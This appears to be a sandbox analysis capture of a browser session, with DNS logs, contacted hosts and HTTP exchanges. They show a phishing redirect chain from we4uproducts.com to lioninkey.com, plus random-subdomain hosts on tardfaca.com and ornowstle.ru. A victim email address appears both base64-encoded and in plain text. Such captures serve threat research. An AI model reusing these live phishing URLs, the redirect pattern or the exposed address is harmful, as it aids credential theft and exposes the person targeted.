                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:12.303214073 CEST1.1.1.1192.168.2.160x73f6No error (0)assets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:12.304109097 CEST1.1.1.1192.168.2.160x141eNo error (0)assets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:12.552572012 CEST1.1.1.1192.168.2.160xd7d1No error (0)creativeassets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:12.568097115 CEST1.1.1.1192.168.2.160x2af5No error (0)creativeassets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:12.777959108 CEST1.1.1.1192.168.2.160x24e5No error (0)s2.go-mpulse.netip46s2.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:12.779937029 CEST1.1.1.1192.168.2.160x25d4No error (0)s2.go-mpulse.netip46s2.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:13.522634983 CEST1.1.1.1192.168.2.160xb62dNo error (0)resources.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:13.525733948 CEST1.1.1.1192.168.2.160x2f12No error (0)ci.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:13.526736021 CEST1.1.1.1192.168.2.160x782eNo error (0)ci.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:13.533585072 CEST1.1.1.1192.168.2.160xa7bbNo error (0)resources.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.106482983 CEST1.1.1.1192.168.2.160x9af2No error (0)creativeassets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.111401081 CEST1.1.1.1192.168.2.160x3131No error (0)creativeassets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.148103952 CEST1.1.1.1192.168.2.160xe5c6No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.148103952 CEST1.1.1.1192.168.2.160xe5c6No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.148103952 CEST1.1.1.1192.168.2.160xe5c6No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.148103952 CEST1.1.1.1192.168.2.160xe5c6No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.208.241.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.148103952 CEST1.1.1.1192.168.2.160xe5c6No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.154.229.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.148103952 CEST1.1.1.1192.168.2.160xe5c6No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.73.19.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.148103952 CEST1.1.1.1192.168.2.160xe5c6No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com18.203.166.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.148103952 CEST1.1.1.1192.168.2.160xe5c6No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.216.81.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.148103952 CEST1.1.1.1192.168.2.160xe5c6No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.229.50.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.148103952 CEST1.1.1.1192.168.2.160xe5c6No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com63.35.71.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.148103952 CEST1.1.1.1192.168.2.160xe5c6No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.210.142.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.148473024 CEST1.1.1.1192.168.2.160xa1fbNo error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.148473024 CEST1.1.1.1192.168.2.160xa1fbNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.148473024 CEST1.1.1.1192.168.2.160xa1fbNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.632483006 CEST1.1.1.1192.168.2.160x4348No error (0)resources.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.640187025 CEST1.1.1.1192.168.2.160x3561No error (0)resources.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.962867975 CEST1.1.1.1192.168.2.160x5a83No error (0)www.asos.comsnir.www.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.963643074 CEST1.1.1.1192.168.2.160xa4aNo error (0)www.asos.comsnir.www.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.981331110 CEST1.1.1.1192.168.2.160xba0No error (0)s2.go-mpulse.netip46s2.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.981913090 CEST1.1.1.1192.168.2.160x73e3No error (0)s2.go-mpulse.netip46s2.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.992212057 CEST1.1.1.1192.168.2.160xfd4eNo error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.993251085 CEST1.1.1.1192.168.2.160x7d47No error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.162118912 CEST1.1.1.1192.168.2.160x9ca1No error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.162261009 CEST1.1.1.1192.168.2.160x20a7No error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.337986946 CEST1.1.1.1192.168.2.160x4cc3No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.337986946 CEST1.1.1.1192.168.2.160x4cc3No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.337986946 CEST1.1.1.1192.168.2.160x4cc3No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.337986946 CEST1.1.1.1192.168.2.160x4cc3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.17.200.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.337986946 CEST1.1.1.1192.168.2.160x4cc3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.208.241.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.337986946 CEST1.1.1.1192.168.2.160x4cc3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.17.240.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.337986946 CEST1.1.1.1192.168.2.160x4cc3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.241.251.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.337986946 CEST1.1.1.1192.168.2.160x4cc3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.210.142.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.337986946 CEST1.1.1.1192.168.2.160x4cc3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.76.121.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.337986946 CEST1.1.1.1192.168.2.160x4cc3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.214.221.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.337986946 CEST1.1.1.1192.168.2.160x4cc3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.154.229.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.339381933 CEST1.1.1.1192.168.2.160x977bNo error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.339381933 CEST1.1.1.1192.168.2.160x977bNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.339381933 CEST1.1.1.1192.168.2.160x977bNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.346276045 CEST1.1.1.1192.168.2.160x7e7No error (0)asos.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.346276045 CEST1.1.1.1192.168.2.160x7e7No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.346276045 CEST1.1.1.1192.168.2.160x7e7No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.346276045 CEST1.1.1.1192.168.2.160x7e7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.250.93.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.346276045 CEST1.1.1.1192.168.2.160x7e7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.241.251.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.346276045 CEST1.1.1.1192.168.2.160x7e7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.17.200.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.346276045 CEST1.1.1.1192.168.2.160x7e7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.72.42.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.346276045 CEST1.1.1.1192.168.2.160x7e7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.210.142.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.346276045 CEST1.1.1.1192.168.2.160x7e7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com63.35.71.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.346276045 CEST1.1.1.1192.168.2.160x7e7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.48.129.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.346276045 CEST1.1.1.1192.168.2.160x7e7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.73.19.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.349447966 CEST1.1.1.1192.168.2.160x6266No error (0)metrics.asos.comasos.com.ssl.d3.sc.omtrdc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.349623919 CEST1.1.1.1192.168.2.160xeb50No error (0)metrics.asos.comasos.com.ssl.d3.sc.omtrdc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.349623919 CEST1.1.1.1192.168.2.160xeb50No error (0)asos.com.ssl.d3.sc.omtrdc.net63.140.62.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.349623919 CEST1.1.1.1192.168.2.160xeb50No error (0)asos.com.ssl.d3.sc.omtrdc.net63.140.62.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.349623919 CEST1.1.1.1192.168.2.160xeb50No error (0)asos.com.ssl.d3.sc.omtrdc.net63.140.62.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.370167017 CEST1.1.1.1192.168.2.160x6f71No error (0)asos.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.370167017 CEST1.1.1.1192.168.2.160x6f71No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.370167017 CEST1.1.1.1192.168.2.160x6f71No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:17.718058109 CEST1.1.1.1192.168.2.160x8d3eNo error (0)metrics.asos.comasos.com.ssl.d3.sc.omtrdc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:17.718058109 CEST1.1.1.1192.168.2.160x8d3eNo error (0)asos.com.ssl.d3.sc.omtrdc.net63.140.62.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:17.718058109 CEST1.1.1.1192.168.2.160x8d3eNo error (0)asos.com.ssl.d3.sc.omtrdc.net63.140.62.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:17.718058109 CEST1.1.1.1192.168.2.160x8d3eNo error (0)asos.com.ssl.d3.sc.omtrdc.net63.140.62.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:17.719337940 CEST1.1.1.1192.168.2.160x5a4eNo error (0)metrics.asos.comasos.com.ssl.d3.sc.omtrdc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:22.704581022 CEST1.1.1.1192.168.2.160x94cfNo error (0)reporting.go-mpulse.netreporting.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:22.713721037 CEST1.1.1.1192.168.2.160x1d86No error (0)reporting.go-mpulse.netreporting.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:23.326314926 CEST1.1.1.1192.168.2.160x81fNo error (0)www.asosglobal.comsnir.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:23.326678991 CEST1.1.1.1192.168.2.160xcf67No error (0)www.asosglobal.comsnir.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:32.678692102 CEST1.1.1.1192.168.2.160x8b18No error (0)cm.everesttech.netcm.everesttech.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:32.679290056 CEST1.1.1.1192.168.2.160xbd76No error (0)images.asos-media.comsnir.asos-media.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:32.679537058 CEST1.1.1.1192.168.2.160x35d0No error (0)cm.everesttech.netcm.everesttech.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:32.685436964 CEST1.1.1.1192.168.2.160x50cNo error (0)images.asos-media.comsnir.asos-media.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.370522022 CEST1.1.1.1192.168.2.160x6f6bNo error (0)cdn.optimizely.com104.18.66.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.370522022 CEST1.1.1.1192.168.2.160x6f6bNo error (0)cdn.optimizely.com104.18.65.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.370986938 CEST1.1.1.1192.168.2.160xb2c0No error (0)cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.454389095 CEST1.1.1.1192.168.2.160x8a37No error (0)a19065870423.cdn.optimizely.com104.18.66.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.454389095 CEST1.1.1.1192.168.2.160x8a37No error (0)a19065870423.cdn.optimizely.com104.18.65.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.455183983 CEST1.1.1.1192.168.2.160x4d98No error (0)a19065870423.cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.286612034 CEST1.1.1.1192.168.2.160x8be8No error (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.286820889 CEST1.1.1.1192.168.2.160xa566No error (0)static.cloudflareinsights.com104.16.79.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.286820889 CEST1.1.1.1192.168.2.160xa566No error (0)static.cloudflareinsights.com104.16.80.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.440104961 CEST1.1.1.1192.168.2.160xb662No error (0)logx.optimizely.com34.49.241.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.554148912 CEST1.1.1.1192.168.2.160x6463No error (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.554790020 CEST1.1.1.1192.168.2.160xb22aNo error (0)static.cloudflareinsights.com104.16.80.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.554790020 CEST1.1.1.1192.168.2.160xb22aNo error (0)static.cloudflareinsights.com104.16.79.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.070013046 CEST1.1.1.1192.168.2.160x4b2No error (0)geolocation.onetrust.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.070590973 CEST1.1.1.1192.168.2.160xbf7dNo error (0)geolocation.onetrust.com104.18.32.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.070590973 CEST1.1.1.1192.168.2.160xbf7dNo error (0)geolocation.onetrust.com172.64.155.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.954269886 CEST1.1.1.1192.168.2.160x52c5No error (0)geolocation.onetrust.com172.64.155.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.954269886 CEST1.1.1.1192.168.2.160x52c5No error (0)geolocation.onetrust.com104.18.32.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.955061913 CEST1.1.1.1192.168.2.160xf489No error (0)geolocation.onetrust.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:44.626444101 CEST1.1.1.1192.168.2.160x991dNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:44.626591921 CEST1.1.1.1192.168.2.160xefa2No error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      • www.google.co.uk
                                                                                                                                                                                                                                                                                      • we4uproducts.com
                                                                                                                                                                                                                                                                                        • fkmd.lioninkey.com
                                                                                                                                                                                                                                                                                      • https:
                                                                                                                                                                                                                                                                                        • cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                                        • challenges.cloudflare.com
                                                                                                                                                                                                                                                                                        • code.jquery.com
                                                                                                                                                                                                                                                                                        • cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.com
                                                                                                                                                                                                                                                                                        • community.sephora.com
                                                                                                                                                                                                                                                                                        • r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ru
                                                                                                                                                                                                                                                                                        • dpm.demdex.net
                                                                                                                                                                                                                                                                                        • asos.demdex.net
                                                                                                                                                                                                                                                                                        • metrics.asos.com
                                                                                                                                                                                                                                                                                        • cdn.optimizely.com
                                                                                                                                                                                                                                                                                        • a19065870423.cdn.optimizely.com
                                                                                                                                                                                                                                                                                        • logx.optimizely.com
                                                                                                                                                                                                                                                                                        • static.cloudflareinsights.com
                                                                                                                                                                                                                                                                                        • geolocation.onetrust.com
                                                                                                                                                                                                                                                                                      • fs.microsoft.com
                                                                                                                                                                                                                                                                                      • a.nel.cloudflare.com
                                                                                                                                                                                                                                                                                      • slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      0192.168.2.1649707213.5.71.85806732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:42.188344002 CEST504OUTGET /cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20= HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: we4uproducts.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:43.016681910 CEST264INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:41 GMT
                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                      refresh: 0;url=https://FkmD.lioninkey.com/6ysw/#Xjordan.black@learfield.com
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:43.064697027 CEST449OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: we4uproducts.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                      Referer: http://we4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20=
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:43.307142019 CEST515INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:42 GMT
                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                      Content-Length: 315
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      1192.168.2.1649768213.5.71.85806732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
